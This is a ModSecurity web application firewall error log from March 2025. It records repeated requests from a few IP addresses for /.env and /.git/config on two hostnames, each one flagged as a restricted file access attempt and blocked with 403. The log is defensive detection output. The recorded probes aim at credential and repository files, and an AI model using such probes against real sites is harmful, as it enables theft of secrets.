[Fri Mar 21 16:50:13.055175 2025] [:error] [pid 1923863] [client 45.148.10.172:38816] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z92KtZ58vYfjPYl6QWTACwAAAAo"]
[Fri Mar 21 16:50:13.055351 2025] [:error] [pid 1923863] [client 45.148.10.172:38816] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z92KtZ58vYfjPYl6QWTACwAAAAo"]
[Sat Mar 22 06:45:33.198664 2025] [:error] [pid 1941977] [client 45.148.10.86:34076] [client 45.148.10.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z95Ofb55E0S_-YHM1n1vpgAAAAQ"]
[Sat Mar 22 06:45:33.198967 2025] [:error] [pid 1941977] [client 45.148.10.86:34076] [client 45.148.10.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z95Ofb55E0S_-YHM1n1vpgAAAAQ"]
[Sat Mar 22 06:45:33.199142 2025] [:error] [pid 1941977] [client 45.148.10.86:34076] [client 45.148.10.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z95Ofb55E0S_-YHM1n1vpgAAAAQ"]
[Sat Mar 22 06:48:44.735611 2025] [:error] [pid 1942011] [client 45.148.10.86:53192] [client 45.148.10.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z95PPI6lDBxxUct_dgyLFAAAAAo"]
[Sat Mar 22 06:48:44.736042 2025] [:error] [pid 1942011] [client 45.148.10.86:53192] [client 45.148.10.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z95PPI6lDBxxUct_dgyLFAAAAAo"]
[Sat Mar 22 06:48:44.736299 2025] [:error] [pid 1942011] [client 45.148.10.86:53192] [client 45.148.10.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z95PPI6lDBxxUct_dgyLFAAAAAo"]
[Sat Mar 22 07:24:27.695604 2025] [:error] [pid 1942000] [client 45.148.10.86:44418] [client 45.148.10.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z95Xm_6L--zIoUUdD_sRbgAAAAc"]
[Sat Mar 22 07:24:27.695987 2025] [:error] [pid 1942000] [client 45.148.10.86:44418] [client 45.148.10.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z95Xm_6L--zIoUUdD_sRbgAAAAc"]
[Sat Mar 22 07:24:27.696180 2025] [:error] [pid 1942000] [client 45.148.10.86:44418] [client 45.148.10.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z95Xm_6L--zIoUUdD_sRbgAAAAc"]
[Sat Mar 22 07:26:49.565609 2025] [:error] [pid 1942011] [client 45.148.10.86:39874] [client 45.148.10.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z95YKY6lDBxxUct_dgyLFgAAAAo"]
[Sat Mar 22 07:26:49.565890 2025] [:error] [pid 1942011] [client 45.148.10.86:39874] [client 45.148.10.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z95YKY6lDBxxUct_dgyLFgAAAAo"]
[Sat Mar 22 07:26:49.566741 2025] [:error] [pid 1942011] [client 45.148.10.86:39874] [client 45.148.10.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z95YKY6lDBxxUct_dgyLFgAAAAo"]
[Sat Mar 22 12:34:18.393484 2025] [:error] [pid 1941992] [client 45.148.10.86:41384] [client 45.148.10.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z96gOsskHoMChc7Uqa5ZtwAAAAY"]
[Sat Mar 22 12:34:18.393797 2025] [:error] [pid 1941992] [client 45.148.10.86:41384] [client 45.148.10.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z96gOsskHoMChc7Uqa5ZtwAAAAY"]
[Sat Mar 22 12:34:18.394013 2025] [:error] [pid 1941992] [client 45.148.10.86:41384] [client 45.148.10.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z96gOsskHoMChc7Uqa5ZtwAAAAY"]
[Sat Mar 22 12:36:12.321957 2025] [:error] [pid 1942000] [client 45.148.10.86:60532] [client 45.148.10.86] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z96grP6L--zIoUUdD_sReAAAAAc"]
[Sat Mar 22 12:36:12.322298 2025] [:error] [pid 1942000] [client 45.148.10.86:60532] [client 45.148.10.86] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z96grP6L--zIoUUdD_sReAAAAAc"]
[Sat Mar 22 12:36:12.322487 2025] [:error] [pid 1942000] [client 45.148.10.86:60532] [client 45.148.10.86] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z96grP6L--zIoUUdD_sReAAAAAc"]
[Sat Mar 22 13:03:36.008373 2025] [:error] [pid 1941992] [client 45.148.10.172:55228] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z96nGMskHoMChc7Uqa5ZuAAAAAY"]
[Sat Mar 22 13:03:36.008706 2025] [:error] [pid 1941992] [client 45.148.10.172:55228] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z96nGMskHoMChc7Uqa5ZuAAAAAY"]
[Sat Mar 22 13:03:36.008881 2025] [:error] [pid 1941992] [client 45.148.10.172:55228] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z96nGMskHoMChc7Uqa5ZuAAAAAY"]
[Sun Mar 23 22:21:24.289850 2025] [:error] [pid 1979111] [client 103.102.230.8:34002] [client 103.102.230.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-B7VPJcMmAOw4wWrNNaVwAAAAY"]
[Sun Mar 23 22:21:24.290124 2025] [:error] [pid 1979111] [client 103.102.230.8:34002] [client 103.102.230.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-B7VPJcMmAOw4wWrNNaVwAAAAY"]
[Sun Mar 23 22:21:24.290293 2025] [:error] [pid 1979111] [client 103.102.230.8:34002] [client 103.102.230.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-B7VPJcMmAOw4wWrNNaVwAAAAY"]
[Sun Mar 23 22:35:01.773247 2025] [:error] [pid 1979107] [client 103.102.230.8:55760] [client 103.102.230.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-B-hayb50xMLoJX0WhOUgAAAAU"]
[Sun Mar 23 22:35:01.773575 2025] [:error] [pid 1979107] [client 103.102.230.8:55760] [client 103.102.230.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-B-hayb50xMLoJX0WhOUgAAAAU"]
[Sun Mar 23 22:35:01.773757 2025] [:error] [pid 1979107] [client 103.102.230.8:55760] [client 103.102.230.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-B-hayb50xMLoJX0WhOUgAAAAU"]
[Mon Mar 24 00:01:28.683376 2025] [:error] [pid 1982815] [client 103.102.230.8:33226] [client 103.102.230.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-CSyKxBabKgxAcIZJrRHgAAAAQ"]
[Mon Mar 24 00:01:28.683691 2025] [:error] [pid 1982815] [client 103.102.230.8:33226] [client 103.102.230.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-CSyKxBabKgxAcIZJrRHgAAAAQ"]
[Mon Mar 24 00:01:28.683893 2025] [:error] [pid 1982815] [client 103.102.230.8:33226] [client 103.102.230.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-CSyKxBabKgxAcIZJrRHgAAAAQ"]
[Mon Mar 24 15:36:37.883547 2025] [:error] [pid 1985190] [client 103.102.230.8:38738] [client 103.102.230.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z-Ft9QuHCcl-Q7N4GDFz1AAAAAI"]
[Mon Mar 24 15:36:37.883888 2025] [:error] [pid 1985190] [client 103.102.230.8:38738] [client 103.102.230.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z-Ft9QuHCcl-Q7N4GDFz1AAAAAI"]
[Mon Mar 24 15:36:37.884132 2025] [:error] [pid 1985190] [client 103.102.230.8:38738] [client 103.102.230.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z-Ft9QuHCcl-Q7N4GDFz1AAAAAI"]
[Mon Mar 24 21:14:35.102287 2025] [:error] [pid 1985189] [client 103.204.189.95:41906] [client 103.204.189.95] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z-G9K2Sep81O5j2xd0rJlwAAAAE"]
[Mon Mar 24 21:14:35.102505 2025] [:error] [pid 1985189] [client 103.204.189.95:41906] [client 103.204.189.95] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z-G9K2Sep81O5j2xd0rJlwAAAAE"]
[Mon Mar 24 21:14:35.102658 2025] [:error] [pid 1985189] [client 103.204.189.95:41906] [client 103.204.189.95] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z-G9K2Sep81O5j2xd0rJlwAAAAE"]
[Mon Mar 24 21:14:35.173369 2025] [:error] [pid 1985767] [client 103.204.189.95:41900] [client 103.204.189.95] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-G9K5P7Mm-RvYK2KP9i8AAAAAg"]
[Mon Mar 24 21:14:35.173647 2025] [:error] [pid 1985767] [client 103.204.189.95:41900] [client 103.204.189.95] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-G9K5P7Mm-RvYK2KP9i8AAAAAg"]
[Mon Mar 24 21:14:35.173838 2025] [:error] [pid 1985767] [client 103.204.189.95:41900] [client 103.204.189.95] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z-G9K5P7Mm-RvYK2KP9i8AAAAAg"]
